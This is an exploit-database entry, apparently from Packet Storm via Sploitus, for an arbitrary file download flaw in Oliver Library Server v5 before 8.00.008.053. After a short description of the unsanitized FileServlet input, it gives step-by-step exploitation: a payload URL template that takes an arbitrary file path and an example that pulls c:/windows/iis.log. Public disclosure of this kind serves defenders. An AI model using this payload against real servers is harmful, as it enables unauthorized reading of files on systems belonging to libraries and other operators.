Share
## https://sploitus.com/exploit?id=PACKETSTORM:165283
# Exploit Title: Oliver Library Server v5 - Arbitrary File Download  
# Date: 14/12/2021  
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group  
# Vendor Homepage: https://www.softlinkint.com/product/oliver/   
# Product: Oliver Server v5  
# Version: < 8.00.008.053  
# Tested on: Windows Server 2016  
  
Technical Description:  
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.  
  
Steps to Exploit:  
  
1) Use the following Payload:  
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>  
  
2) Example to download iis.log file:  
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log